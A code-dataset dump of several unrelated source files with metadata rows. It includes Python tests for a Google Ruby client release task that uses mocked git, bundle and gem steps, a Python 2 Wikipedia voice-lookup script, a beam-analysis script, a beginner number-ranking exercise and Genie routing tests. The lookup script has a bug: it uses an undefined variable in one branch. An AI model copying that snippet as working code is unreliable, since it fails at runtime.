    manager.attach_mock(check_output_mock, 'check_output')
    manager.attach_mock(repo_mock, 'repo')
    google_api_ruby_client.update('/tmp', common.GITHUB_ACCOUNT)
    assert manager.mock_calls == [
        call.clone_from_github('google/google-api-ruby-client',
                               '/tmp/google-api-ruby-client',
                               github_account=common.GITHUB_ACCOUNT),
        call.check_output(['bundle', 'install', '--path', 'vendor/bundle'],
                          cwd='/tmp/google-api-ruby-client'),
        call.check_output(['rm', '-rf', 'generated'],
                          cwd='/tmp/google-api-ruby-client'),
        call.check_output(['git', 'checkout',
                           'generated/google/apis/discovery_v1.rb',
                           'generated/google/apis/discovery_v1'],
                          cwd='/tmp/google-api-ruby-client'),
        call.check_output(['./script/generate'],
                          cwd='/tmp/google-api-ruby-client'),
        call.repo.diff_name_status(staged=False),
        call.check_output(['bundle', 'exec', 'rake', 'spec'],
                          cwd='/tmp/google-api-ruby-client'),
        call.repo.add(['api_names_out.yaml', 'generated']),
        # Sections appear in Add/Delete/Update order, one API name per line.
        call.repo.commit(('Autogenerated update (2000-01-01)\n'
                          '\nAdd:\n- foo_v1\n'
                          '\nDelete:\n- baz_v1\n'
                          '\nUpdate:\n- bar_v1'),
                         'Alice',
                         'alice@test.com'),
        call.repo.push()
    ]
@patch('tasks.google_api_ruby_client.check_output')
@patch('tasks.google_api_ruby_client._git.clone_from_github')
def test_update_no_changes(clone_from_github_mock, check_output_mock):
    """update() must stop after the diff step when nothing was regenerated.

    An empty diff means there is nothing to test, commit, or push, so the
    recorded call sequence must end at diff_name_status().
    """
    mock_repo = Mock()
    mock_repo.diff_name_status.return_value = []
    clone_from_github_mock.side_effect = (
        common.clone_from_github_mock_side_effect(mock_repo))
    # Attach all mocks to one recorder so ordering across them is asserted.
    recorder = Mock()
    recorder.attach_mock(clone_from_github_mock, 'clone_from_github')
    recorder.attach_mock(check_output_mock, 'check_output')
    recorder.attach_mock(mock_repo, 'repo')
    google_api_ruby_client.update('/tmp', common.GITHUB_ACCOUNT)
    expected_calls = [
        call.clone_from_github('google/google-api-ruby-client',
                               '/tmp/google-api-ruby-client',
                               github_account=common.GITHUB_ACCOUNT),
        call.check_output(['bundle', 'install', '--path', 'vendor/bundle'],
                          cwd='/tmp/google-api-ruby-client'),
        call.check_output(['rm', '-rf', 'generated'],
                          cwd='/tmp/google-api-ruby-client'),
        call.check_output(['git', 'checkout',
                           'generated/google/apis/discovery_v1.rb',
                           'generated/google/apis/discovery_v1'],
                          cwd='/tmp/google-api-ruby-client'),
        call.check_output(['./script/generate'],
                          cwd='/tmp/google-api-ruby-client'),
        call.repo.diff_name_status(staged=False)
    ]
    assert recorder.mock_calls == expected_calls
@patch('tasks.google_api_ruby_client.os.chmod')
@patch('tasks.google_api_ruby_client.os.path.expanduser')
@patch('tasks.google_api_ruby_client.open', new_callable=mock_open)
@patch('tasks.google_api_ruby_client.check_output')
@patch('tasks.google_api_ruby_client._git.clone_from_github')
def test_release_minor(clone_from_github_mock,
                       check_output_mock,
                       open_mock,
                       expanduser_mock,
                       chmod_mock):
    """Verify release() performs a minor version bump (0.13.6 -> 0.14.0).

    The diff since the last tag contains a DELETED file — a breaking
    change — so release() must bump the minor version, rewrite version.rb
    and CHANGELOG.md, run the spec suite, commit, tag, push, build the gem,
    write the RubyGems credentials file, and push the gem.
    """
    repo_mock = Mock()
    repo_mock.latest_tag.return_value = '0.13.6'
    # Two identical author emails: every commit since the tag is by one
    # person, so the single-author check passes and the release proceeds.
    repo_mock.authors_since.return_value = ['alice@test.com', 'alice@test.com']
    repo_mock.diff_name_status.return_value = [
        ('generated/google/apis/foo_v1.rb', _git.Status.ADDED),
        ('generated/google/apis/bar_v1.rb', _git.Status.DELETED),
        ('generated/google/apis/baz_v1.rb', _git.Status.UPDATED),
    ]
    side_effect = common.clone_from_github_mock_side_effect(repo_mock)
    clone_from_github_mock.side_effect = side_effect
    # `gem search` output: the published version matches the latest tag.
    check_output_mock.return_value = 'google-api-client (0.13.6)'
    open_version_rb_mock = mock_open(
        read_data=('...\n'
                   'module Google\n'
                   '  module Apis\n'
                   '    # Client library version\n'
                   '    VERSION = \'0.13.6\'\n'
                   '    ...\n'))
    open_changelog_md_mock = mock_open(read_data='...\n')
    open_credentials_mock = mock_open()
    # Five open() calls, in order: version.rb (read), version.rb (write),
    # CHANGELOG.md (read), CHANGELOG.md (write), ~/.gem/credentials (write).
    open_mock.side_effect = [
        open_version_rb_mock.return_value,
        open_version_rb_mock.return_value,
        open_changelog_md_mock.return_value,
        open_changelog_md_mock.return_value,
        open_credentials_mock.return_value
    ]
    # Resolve "~" to a fixed home directory for the credentials path.
    expanduser_mock.side_effect = lambda x: '/home/test' + x[1:]
    # A parent mock records calls on all attached mocks in one ordered list.
    manager = Mock()
    manager.attach_mock(clone_from_github_mock, 'clone_from_github')
    manager.attach_mock(check_output_mock, 'check_output')
    manager.attach_mock(open_mock, 'open')
    manager.attach_mock(repo_mock, 'repo')
    manager.attach_mock(chmod_mock, 'chmod')
    manager.attach_mock(open_version_rb_mock, 'open_version_rb')
    manager.attach_mock(open_changelog_md_mock, 'open_changelog_md')
    manager.attach_mock(open_credentials_mock, 'open_credentials')
    google_api_ruby_client.release(
        '/tmp', common.GITHUB_ACCOUNT, _RUBYGEMS_ACCOUNT)
    assert manager.mock_calls == [
        call.clone_from_github('google/google-api-ruby-client',
                               '/tmp/google-api-ruby-client',
                               github_account=common.GITHUB_ACCOUNT),
        call.repo.latest_tag(),
        call.repo.authors_since('0.13.6'),
        call.check_output(['gem', 'search', '-r', '^google-api-client$']),
        call.repo.diff_name_status(rev='0.13.6'),
        call.open('/tmp/google-api-ruby-client/lib/google/apis/version.rb'),
        call.open_version_rb().__enter__(),
        call.open_version_rb().read(),
        call.open_version_rb().__exit__(None, None, None),
        call.open(
            '/tmp/google-api-ruby-client/lib/google/apis/version.rb', 'w'),
        call.open_version_rb().__enter__(),
        # version.rb rewritten with the bumped minor version.
        call.open_version_rb().write(('...\n'
                                      'module Google\n'
                                      '  module Apis\n'
                                      '    # Client library version\n'
                                      '    VERSION = \'0.14.0\'\n'
                                      '    ...\n')),
        call.open_version_rb().__exit__(None, None, None),
        call.open('/tmp/google-api-ruby-client/CHANGELOG.md'),
        call.open_changelog_md().__enter__(),
        call.open_changelog_md().read(),
        call.open_changelog_md().__exit__(None, None, None),
        call.open('/tmp/google-api-ruby-client/CHANGELOG.md', 'w'),
        call.open_changelog_md().__enter__(),
        # New changelog entry is prepended: the DELETED api goes under
        # "Breaking changes", ADDED/UPDATED under "Backwards compatible".
        call.open_changelog_md().write(('# 0.14.0\n'
                                        '* Breaking changes:\n'
                                        '  * Deleted `bar_v1`\n'
                                        '* Backwards compatible changes:\n'
                                        '  * Added `foo_v1`\n'
                                        '  * Updated `baz_v1`\n\n'
                                        '...\n')),
        call.open_changelog_md().__exit__(None, None, None),
        call.check_output(['bundle', 'install', '--path', 'vendor/bundle'],
                          cwd='/tmp/google-api-ruby-client'),
        call.check_output(['bundle', 'exec', 'rake', 'spec'],
                          cwd='/tmp/google-api-ruby-client'),
        call.repo.commit('0.14.0', 'Alice', 'alice@test.com'),
        call.repo.tag('0.14.0'),
        call.repo.push(),
        call.repo.push(tags=True),
        call.check_output(['./script/package'],
                          cwd='/tmp/google-api-ruby-client'),
        call.open('/home/test/.gem/credentials', 'w'),
        call.open_credentials().__enter__(),
        call.open_credentials().write('---\n:rubygems_api_key: api_key\n'),
        call.open_credentials().__exit__(None, None, None),
        # Credentials file must be user-only readable/writable.
        call.chmod('/home/test/.gem/credentials', 0o600),
        call.check_output(['gem', 'push', 'pkg/google-api-client-0.14.0.gem'],
                          cwd='/tmp/google-api-ruby-client')
    ]
@patch('tasks.google_api_ruby_client.os.chmod')
@patch('tasks.google_api_ruby_client.os.path.expanduser')
@patch('tasks.google_api_ruby_client.open', new_callable=mock_open)
@patch('tasks.google_api_ruby_client.check_output')
@patch('tasks.google_api_ruby_client._git.clone_from_github')
def test_release_patch(clone_from_github_mock,
                       check_output_mock,
                       open_mock,
                       expanduser_mock,
                       chmod_mock):
    """Verify release() performs a patch version bump (0.13.6 -> 0.13.7).

    The diff since the last tag contains only ADDED and UPDATED files — no
    deletions, hence no breaking changes — so release() must bump only the
    patch version and the changelog entry must contain only the
    "Backwards compatible changes" section.
    """
    repo_mock = Mock()
    repo_mock.latest_tag.return_value = '0.13.6'
    # Single author across all commits since the tag: release may proceed.
    repo_mock.authors_since.return_value = ['alice@test.com', 'alice@test.com']
    repo_mock.diff_name_status.return_value = [
        ('generated/google/apis/foo_v1.rb', _git.Status.ADDED),
        ('generated/google/apis/baz_v1.rb', _git.Status.UPDATED),
    ]
    side_effect = common.clone_from_github_mock_side_effect(repo_mock)
    clone_from_github_mock.side_effect = side_effect
    # `gem search` output: the published version matches the latest tag.
    check_output_mock.return_value = 'google-api-client (0.13.6)'
    open_version_rb_mock = mock_open(
        read_data=('...\n'
                   'module Google\n'
                   '  module Apis\n'
                   '    # Client library version\n'
                   '    VERSION = \'0.13.6\'\n'
                   '    ...\n'))
    open_changelog_md_mock = mock_open(read_data='...\n')
    open_credentials_mock = mock_open()
    # Five open() calls, in order: version.rb (read), version.rb (write),
    # CHANGELOG.md (read), CHANGELOG.md (write), ~/.gem/credentials (write).
    open_mock.side_effect = [
        open_version_rb_mock.return_value,
        open_version_rb_mock.return_value,
        open_changelog_md_mock.return_value,
        open_changelog_md_mock.return_value,
        open_credentials_mock.return_value
    ]
    # Resolve "~" to a fixed home directory for the credentials path.
    expanduser_mock.side_effect = lambda x: '/home/test' + x[1:]
    # A parent mock records calls on all attached mocks in one ordered list.
    manager = Mock()
    manager.attach_mock(clone_from_github_mock, 'clone_from_github')
    manager.attach_mock(check_output_mock, 'check_output')
    manager.attach_mock(open_mock, 'open')
    manager.attach_mock(repo_mock, 'repo')
    manager.attach_mock(chmod_mock, 'chmod')
    manager.attach_mock(open_version_rb_mock, 'open_version_rb')
    manager.attach_mock(open_changelog_md_mock, 'open_changelog_md')
    manager.attach_mock(open_credentials_mock, 'open_credentials')
    google_api_ruby_client.release(
        '/tmp', common.GITHUB_ACCOUNT, _RUBYGEMS_ACCOUNT)
    assert manager.mock_calls == [
        call.clone_from_github('google/google-api-ruby-client',
                               '/tmp/google-api-ruby-client',
                               github_account=common.GITHUB_ACCOUNT),
        call.repo.latest_tag(),
        call.repo.authors_since('0.13.6'),
        call.check_output(['gem', 'search', '-r', '^google-api-client$']),
        call.repo.diff_name_status(rev='0.13.6'),
        call.open('/tmp/google-api-ruby-client/lib/google/apis/version.rb'),
        call.open_version_rb().__enter__(),
        call.open_version_rb().read(),
        call.open_version_rb().__exit__(None, None, None),
        call.open(
            '/tmp/google-api-ruby-client/lib/google/apis/version.rb', 'w'),
        call.open_version_rb().__enter__(),
        # version.rb rewritten with the bumped patch version.
        call.open_version_rb().write(('...\n'
                                      'module Google\n'
                                      '  module Apis\n'
                                      '    # Client library version\n'
                                      '    VERSION = \'0.13.7\'\n'
                                      '    ...\n')),
        call.open_version_rb().__exit__(None, None, None),
        call.open('/tmp/google-api-ruby-client/CHANGELOG.md'),
        call.open_changelog_md().__enter__(),
        call.open_changelog_md().read(),
        call.open_changelog_md().__exit__(None, None, None),
        call.open('/tmp/google-api-ruby-client/CHANGELOG.md', 'w'),
        call.open_changelog_md().__enter__(),
        # No deletions, so no "Breaking changes" section in the entry.
        call.open_changelog_md().write(('# 0.13.7\n'
                                        '* Backwards compatible changes:\n'
                                        '  * Added `foo_v1`\n'
                                        '  * Updated `baz_v1`\n\n'
                                        '...\n')),
        call.open_changelog_md().__exit__(None, None, None),
        call.check_output(['bundle', 'install', '--path', 'vendor/bundle'],
                          cwd='/tmp/google-api-ruby-client'),
        call.check_output(['bundle', 'exec', 'rake', 'spec'],
                          cwd='/tmp/google-api-ruby-client'),
        call.repo.commit('0.13.7', 'Alice', 'alice@test.com'),
        call.repo.tag('0.13.7'),
        call.repo.push(),
        call.repo.push(tags=True),
        call.check_output(['./script/package'],
                          cwd='/tmp/google-api-ruby-client'),
        call.open('/home/test/.gem/credentials', 'w'),
        call.open_credentials().__enter__(),
        call.open_credentials().write('---\n:rubygems_api_key: api_key\n'),
        call.open_credentials().__exit__(None, None, None),
        # Credentials file must be user-only readable/writable.
        call.chmod('/home/test/.gem/credentials', 0o600),
        call.check_output(['gem', 'push', 'pkg/google-api-client-0.13.7.gem'],
                          cwd='/tmp/google-api-ruby-client')
    ]
@patch('tasks.google_api_ruby_client._git.clone_from_github')
def test_release_no_commits_since_latest_tag(clone_from_github_mock):
    """A latest tag outside the 0.x.y scheme aborts the release immediately."""
    git_repo = Mock()
    git_repo.latest_tag.return_value = '1.0.0'
    clone_from_github_mock.side_effect = (
        common.clone_from_github_mock_side_effect(git_repo))
    # Record every interaction on one manager so call order can be asserted.
    recorder = Mock()
    recorder.attach_mock(clone_from_github_mock, 'clone_from_github')
    recorder.attach_mock(git_repo, 'repo')
    with pytest.raises(Exception) as excinfo:
        google_api_ruby_client.release(
            '/tmp', common.GITHUB_ACCOUNT, _RUBYGEMS_ACCOUNT)
    expected_message = ('latest tag does not match the pattern'
                        r' "^0\.([0-9]+)\.([0-9]+)$": 1.0.0')
    assert str(excinfo.value) == expected_message
    # Nothing past the tag check may have run.
    assert recorder.mock_calls == [
        call.clone_from_github('google/google-api-ruby-client',
                               '/tmp/google-api-ruby-client',
                               github_account=common.GITHUB_ACCOUNT),
        call.repo.latest_tag(),
    ]
@patch('tasks.google_api_ruby_client._git.clone_from_github')
def test_release_different_authors_since_latest_tag(clone_from_github_mock):
    """Multiple distinct authors since the tag stop the release after the check."""
    git_repo = Mock()
    git_repo.latest_tag.return_value = '0.13.6'
    git_repo.authors_since.return_value = ['alice@test.com', 'bob@test.com']
    clone_from_github_mock.side_effect = (
        common.clone_from_github_mock_side_effect(git_repo))
    # Record every interaction on one manager so call order can be asserted.
    recorder = Mock()
    recorder.attach_mock(clone_from_github_mock, 'clone_from_github')
    recorder.attach_mock(git_repo, 'repo')
    google_api_ruby_client.release(
        '/tmp', common.GITHUB_ACCOUNT, _RUBYGEMS_ACCOUNT)
    # The flow must end right after the authors check.
    assert recorder.mock_calls == [
        call.clone_from_github('google/google-api-ruby-client',
                               '/tmp/google-api-ruby-client',
                               github_account=common.GITHUB_ACCOUNT),
        call.repo.latest_tag(),
        call.repo.authors_since('0.13.6')
    ]
@patch('tasks.google_api_ruby_client.os.chmod')
@patch('tasks.google_api_ruby_client.os.path.expanduser')
@patch('tasks.google_api_ruby_client.open', new_callable=mock_open)
@patch('tasks.google_api_ruby_client.check_output')
@patch('tasks.google_api_ruby_client._git.clone_from_github')
def test_release_force(clone_from_github_mock,
                       check_output_mock,
                       open_mock,
                       expanduser_mock,
                       chmod_mock):
    """force=True releases even when several authors follow the latest tag."""
    git_repo = Mock()
    git_repo.latest_tag.return_value = '0.13.6'
    git_repo.authors_since.return_value = [
        'alice@test.com', 'alice@test.com']
    git_repo.diff_name_status.return_value = [
        ('generated/google/apis/foo_v1.rb', _git.Status.ADDED),
        ('generated/google/apis/baz_v1.rb', _git.Status.UPDATED),
    ]
    clone_from_github_mock.side_effect = (
        common.clone_from_github_mock_side_effect(git_repo))
    check_output_mock.return_value = 'google-api-client (0.13.6)'
    # One mock_open per file touched by the release flow.
    version_rb_mock = mock_open(
        read_data=('...\n'
                   'module Google\n'
                   ' module Apis\n'
                   ' # Client library version\n'
                   ' VERSION = \'0.13.6\'\n'
                   ' ...\n'))
    changelog_md_mock = mock_open(read_data='...\n')
    credentials_mock = mock_open()
    open_mock.side_effect = [
        version_rb_mock.return_value,
        version_rb_mock.return_value,
        changelog_md_mock.return_value,
        changelog_md_mock.return_value,
        credentials_mock.return_value
    ]
    expanduser_mock.side_effect = lambda path: '/home/test' + path[1:]
    google_api_ruby_client.release(
        '/tmp', common.GITHUB_ACCOUNT, _RUBYGEMS_ACCOUNT, force=True)
    # We don't bother verifying all calls in this case, since we only want to
    # verify that the different authors check was passed.
    assert git_repo.mock_calls == [
        call.latest_tag(),
        call.authors_since('0.13.6'),
        call.diff_name_status(rev='0.13.6'),
        call.commit('0.13.7', 'Alice', 'alice@test.com'),
        call.tag('0.13.7'),
        call.push(),
        call.push(tags=True),
    ]
@patch('tasks.google_api_ruby_client.check_output')
@patch('tasks.google_api_ruby_client._git.clone_from_github')
def test_release_latest_version_mismatch(clone_from_github_mock,
                                         check_output_mock):
    """A RubyGems version that differs from the latest tag aborts the flow."""
    git_repo = Mock()
    git_repo.latest_tag.return_value = '0.13.6'
    git_repo.authors_since.return_value = ['alice@test.com']
    clone_from_github_mock.side_effect = (
        common.clone_from_github_mock_side_effect(git_repo))
    check_output_mock.return_value = 'google-api-client (1.0.0)'
    # Record every interaction on one manager so call order can be asserted.
    recorder = Mock()
    recorder.attach_mock(clone_from_github_mock, 'clone_from_github')
    recorder.attach_mock(check_output_mock, 'check_output')
    recorder.attach_mock(git_repo, 'repo')
    with pytest.raises(Exception) as excinfo:
        google_api_ruby_client.release(
            '/tmp', common.GITHUB_ACCOUNT, _RUBYGEMS_ACCOUNT)
    assert str(excinfo.value) == (
        'latest tag does not match the latest package version on'
        ' RubyGems: 0.13.6 != 1.0.0')
    # Nothing past the gem-version comparison may have run.
    assert recorder.mock_calls == [
        call.clone_from_github('google/google-api-ruby-client',
                               '/tmp/google-api-ruby-client',
                               github_account=common.GITHUB_ACCOUNT),
        call.repo.latest_tag(),
        call.repo.authors_since('0.13.6'),
        call.check_output(['gem', 'search', '-r', '^google-api-client$']),
    ]
| 46.950562
| 79
| 0.61389
| 2,599
| 20,893
| 4.595614
| 0.085417
| 0.061035
| 0.078366
| 0.114534
| 0.903969
| 0.900871
| 0.894675
| 0.891829
| 0.883707
| 0.879102
| 0
| 0.01296
| 0.253961
| 20,893
| 444
| 80
| 47.056306
| 0.75332
| 0.033217
| 0
| 0.807595
| 0
| 0
| 0.258584
| 0.1475
| 0
| 0
| 0
| 0
| 0.025316
| 1
| 0.020253
| false
| 0
| 0.010127
| 0
| 0.03038
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a3d26d3d6a3b64d3fbb4d9e690a0dd065c201e2b
| 2,033
|
py
|
Python
|
Python_Assistant/PyAssist/lookup.py
|
GeekyShiva/PyAssist
|
a8761cfcd8344771e7e1bfab469ed3e49f12adda
|
[
"MIT"
] | null | null | null |
Python_Assistant/PyAssist/lookup.py
|
GeekyShiva/PyAssist
|
a8761cfcd8344771e7e1bfab469ed3e49f12adda
|
[
"MIT"
] | null | null | null |
Python_Assistant/PyAssist/lookup.py
|
GeekyShiva/PyAssist
|
a8761cfcd8344771e7e1bfab469ed3e49f12adda
|
[
"MIT"
] | 1
|
2020-08-17T15:01:43.000Z
|
2020-08-17T15:01:43.000Z
|
def lookup(input):
import wikipedia
from findpic import imgLookup
from espeak import espeak
if input.startswith('look up'):
wikiLookUp = input[7:]
print "Searched for: "+wikiLookUp
espeak.synth("Searched for: "+wikiLookUp)
print 'Results from wikipedia:'
print wikipedia.summary(wikiLookUp)
imgLookup(wikiLookUp)
if input.startswith('who is '):
wikiLookUp = input[7:]
print "Searched for: "+wikiLookUp
espeak.synth("Searched for: "+wikiLookUp)
print wikipedia.summary(wikiLookUp)
imgLookup(wikiLookUp)
if input.startswith('who was '):
wikiLookUp = input[8:]
print "Searched for: "+wikiLookUp
espeak.synth("Searched for: "+wikiLookUp)
print wikipedia.summary(wikiLookUp)
imgLookup(wikiLookUp)
if input.startswith('what is '):
print input[7:8]
if input[8:10] == 'a ':
wikiLookUp = input[10:]
print "Searched for: "+wikiLookUp
espeak.synth("Searched for: "+wikiLookUp)
print wikipedia.summary(wikiLookUp)
imgLookup(wikiLookUp)
if input[8:11] == 'an ':
wikiLookUp = input[11:]
print "Searched for: "+wikiLookUp
espeak.synth("Searched for: "+wikiLookUp)
print wikipedia.summary(wikiLookUp)
elif input[8:11] != 'an ' and input[8:10] != 'a ':
wikiLookUp = input[8:]
print "Searched for: "+wikiLookUp
espeak.synth("Searched for: "+wikiLookUp)
print wikipedia.summary(wikiLookUp)
imgLookup(wikiLookUp)
if input.startswith('where is '):
wikiLookUp = input[9:]
print "Searched for: "+wikiLookUp
espeak.synth("Searched for: "+wikiLookUp)
print wikipedia.summary(wikiLookUp)
imgLookup(wikiLookUp)
if input.startswith('how '):
print "Searched for: "+input
espeak.synth("Searched for: "+input)
imgLookup(wikiLookUp)
| 35.666667
| 58
| 0.598131
| 205
| 2,033
| 5.931707
| 0.170732
| 0.144737
| 0.241776
| 0.144737
| 0.770559
| 0.770559
| 0.743421
| 0.743421
| 0.743421
| 0.743421
| 0
| 0.015939
| 0.290212
| 2,033
| 56
| 59
| 36.303571
| 0.82675
| 0
| 0
| 0.615385
| 0
| 0
| 0.147565
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.057692
| null | null | 0.326923
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a3dc047950348d212cb49f2f4d3d895a2f0cfa14
| 2,282
|
py
|
Python
|
feebb/test_sub.py
|
rbn920/feebb
|
b2ae340052122e43b812af1a36ae1128405f0220
|
[
"MIT"
] | null | null | null |
feebb/test_sub.py
|
rbn920/feebb
|
b2ae340052122e43b812af1a36ae1128405f0220
|
[
"MIT"
] | null | null | null |
feebb/test_sub.py
|
rbn920/feebb
|
b2ae340052122e43b812af1a36ae1128405f0220
|
[
"MIT"
] | 1
|
2021-02-09T17:22:16.000Z
|
2021-02-09T17:22:16.000Z
|
from feebb import *
import matplotlib.pyplot as plt
import itertools
def _report(post):
    """Print the extrema of, then plot, the interpolated moment and shear.

    Calls post.interp once per action and reuses the result (the original
    script recomputed it for max, min and plot).
    """
    for action in ('moment', 'shear'):
        values = post.interp(action)
        print(max(values))
        print(min(values))
        plt.plot(values)
        plt.show()


def _analyze_submeshed(json_path, mesh=100, interp_points=2):
    """Load a model, submesh every element, solve it and report the results.

    json_path: model definition consumed by Preprocessor.load_json.
    mesh: number of sub-elements per element.
    interp_points: interpolation density handed to Postprocessor.
    """
    pre = Preprocessor()
    pre.load_json(json_path)
    meshed = [Submesh(elem, mesh).submesh for elem in pre.elements]
    meshed_flat = list(itertools.chain.from_iterable(meshed))
    elems = [Element(elem) for elem in meshed_flat]
    meshed_supports = submesh_supports(pre.supports, mesh)
    beam = Beam(elems, meshed_supports)
    _report(Postprocessor(beam, interp_points))


# Beam 1 (unmeshed); also echoes the raw supports as in the original script.
pre = Preprocessor()
pre.load_json('ex_json/test2.json')
elems = [Element(elem) for elem in pre.elements]
print(pre.supports)
beam = Beam(elems, pre.supports)
_report(Postprocessor(beam, 10))

# Beams 1, 2 and 3 submeshed -- previously three copy-pasted blocks that
# differed only in the JSON path.
for _path in ('ex_json/test2.json', 'ex_json/test.json', 'ex_json/test3.json'):
    _analyze_submeshed(_path)
| 29.25641
| 63
| 0.741017
| 345
| 2,282
| 4.826087
| 0.136232
| 0.144144
| 0.115315
| 0.086486
| 0.917718
| 0.911111
| 0.896096
| 0.896096
| 0.841441
| 0.794595
| 0
| 0.010053
| 0.084575
| 2,282
| 77
| 64
| 29.636364
| 0.786979
| 0.024978
| 0
| 0.867647
| 0
| 0
| 0.091441
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.044118
| 0
| 0.044118
| 0.25
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4a4c2ff26ec1ce6b388df35e605e4dad5c197ad4
| 846
|
py
|
Python
|
exercicios033.py
|
Capcode98/exercicios-PYTHON3-MUNDO1
|
c3d186dba25274a72ec347320e2376ac8f8f9b1f
|
[
"MIT"
] | null | null | null |
exercicios033.py
|
Capcode98/exercicios-PYTHON3-MUNDO1
|
c3d186dba25274a72ec347320e2376ac8f8f9b1f
|
[
"MIT"
] | null | null | null |
exercicios033.py
|
Capcode98/exercicios-PYTHON3-MUNDO1
|
c3d186dba25274a72ec347320e2376ac8f8f9b1f
|
[
"MIT"
] | null | null | null |
# Read three numbers and report, for each one, whether it is the largest,
# the smallest, or the middle value of the trio.
a = float(input('qual o primeiro numero? '))
b = float(input('qual o segundo numero? '))
c = float(input('qual o terceiro numero? '))

# Each triple is (value under test, first other, second other); iterating the
# same triples three times reproduces the original print order exactly.
trios = ((a, b, c), (b, a, c), (c, b, a))

for atual, x, y in trios:
    if atual > x and atual > y:
        print('o numero {} é o maior de todos '.format(atual))
for atual, x, y in trios:
    if atual < x and atual < y:
        print('o numero {} é o menor de todos '.format(atual))
for atual, x, y in trios:
    if atual < x and atual > y or atual > x and atual < y:
        print('o numero {} é o do meio '.format(atual))
| 40.285714
| 54
| 0.562648
| 180
| 846
| 2.644444
| 0.127778
| 0.113445
| 0.226891
| 0.245798
| 0.798319
| 0.798319
| 0.798319
| 0.798319
| 0.731092
| 0.659664
| 0
| 0
| 0.274232
| 846
| 21
| 55
| 40.285714
| 0.775244
| 0
| 0
| 0
| 0
| 0
| 0.390791
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.428571
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
434a3dc38dafb5e565acc8877b24b21366708a9d
| 3,120
|
py
|
Python
|
pkgs/conf-pkg/src/genie/libs/conf/routing/iosxe/tests/test_routing.py
|
jbronikowski/genielibs
|
200a34e5fe4838a27b5a80d5973651b2e34ccafb
|
[
"Apache-2.0"
] | 94
|
2018-04-30T20:29:15.000Z
|
2022-03-29T13:40:31.000Z
|
pkgs/conf-pkg/src/genie/libs/conf/routing/iosxe/tests/test_routing.py
|
jbronikowski/genielibs
|
200a34e5fe4838a27b5a80d5973651b2e34ccafb
|
[
"Apache-2.0"
] | 67
|
2018-12-06T21:08:09.000Z
|
2022-03-29T18:00:46.000Z
|
pkgs/conf-pkg/src/genie/libs/conf/routing/iosxe/tests/test_routing.py
|
jbronikowski/genielibs
|
200a34e5fe4838a27b5a80d5973651b2e34ccafb
|
[
"Apache-2.0"
] | 49
|
2018-06-29T18:59:03.000Z
|
2022-03-10T02:07:59.000Z
|
#!/usr/bin/env python
# Python
import unittest
from unittest.mock import Mock
# Genie package
from genie.conf import Genie
from genie.tests.conf import TestCase
from genie.conf.base import Testbed, Device
# Genie Conf
from genie.libs.conf.routing import Routing
class test_routing(TestCase):
    """Config/unconfig build tests for the Routing feature on IOS-XE."""

    def _build_device_with_routing(self):
        """Create a fresh testbed + PE1 device with a Routing feature attached."""
        # For failures: show complete diffs.
        self.maxDiff = None
        Genie.testbed = testbed = Testbed()
        device = Device(testbed=testbed, name='PE1', os='iosxe')
        routing = Routing()
        device.add_feature(routing)
        return device, routing

    def _assert_config(self, device, routing, expected_cfg, expected_uncfg):
        """Check both the built config and unconfig against expected lines."""
        cfgs = routing.build_config(apply=False)
        self.assertMultiLineEqual(
            str(cfgs[device.name]),
            '\n'.join(expected_cfg))
        uncfgs = routing.build_unconfig(apply=False)
        self.assertMultiLineEqual(
            str(uncfgs[device.name]),
            '\n'.join(expected_uncfg))

    def test_full(self):
        device, routing = self._build_device_with_routing()
        routing.device_attr[device].enabled = True
        self._assert_config(
            device, routing,
            ['ip routing',
             'ipv6 unicast routing'],
            ['no ip routing',
             'no ipv6 unicast routing'])

    def test_ipv4(self):
        device, routing = self._build_device_with_routing()
        routing.device_attr[device].enabled_ip_routing = True
        self._assert_config(
            device, routing,
            ['ip routing'],
            ['no ip routing'])

    def test_ipv6(self):
        device, routing = self._build_device_with_routing()
        routing.device_attr[device].enabled_ipv6_unicast_routing = True
        self._assert_config(
            device, routing,
            ['ipv6 unicast routing'],
            ['no ipv6 unicast routing'])
# Allow running this test module directly (e.g. `python test_routing.py`).
if __name__ == '__main__':
    unittest.main()
| 25.16129
| 69
| 0.565385
| 316
| 3,120
| 5.490506
| 0.199367
| 0.072622
| 0.051873
| 0.072622
| 0.803458
| 0.803458
| 0.803458
| 0.803458
| 0.803458
| 0.803458
| 0
| 0.012083
| 0.336859
| 3,120
| 123
| 70
| 25.365854
| 0.826486
| 0.157051
| 0
| 0.779412
| 0
| 0
| 0.067562
| 0
| 0
| 0
| 0
| 0
| 0.088235
| 1
| 0.044118
| false
| 0
| 0.088235
| 0
| 0.147059
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
43a329d01849829f2358d7be10147f55a9396f2b
| 8,574
|
py
